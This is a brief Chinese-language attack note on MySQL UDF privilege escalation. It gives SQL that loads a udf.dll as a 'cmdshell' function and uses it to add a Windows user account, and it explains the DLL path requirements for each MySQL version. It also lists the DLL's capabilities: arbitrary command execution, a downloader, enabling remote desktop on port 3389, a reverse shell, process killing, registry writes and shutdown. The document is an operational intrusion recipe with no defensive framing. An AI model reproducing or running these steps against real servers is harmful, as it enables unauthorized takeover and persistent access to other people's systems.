Mysql udf提权

连上udf.php

Create Function cmdshell returns string soname 'udf.dll'; 
select cmdshell("net user nsfocus Nsf0cus /add");

备注: 一、路径 • Mysql<5.0,导出路径随意; • 5.0<=mysql<5.1,则需要导出至目标服务器 的系统目录(如:system32),否则在下一步 操作中你会看到No paths allowed for shared library错误; • mysql>5.1,需要导出dll到插件路径,例如: D:\Program Files\MySQL\MySQL Server 5.1.3\lib\plugin

二、功能函数

cmdshell 执行cmd; downloader 下载者,到网上下载指定文件并保存到指定目录; open3389 通用开3389终端服务,可指定端口(不改端口无需重启); backshell 反弹Shell; ProcessView 枚举系统进程; KillProcess 终止指定进程; regread 读注册表; regwrite 写注册表; shut 关机,注销,重启; about 说明与帮助函数;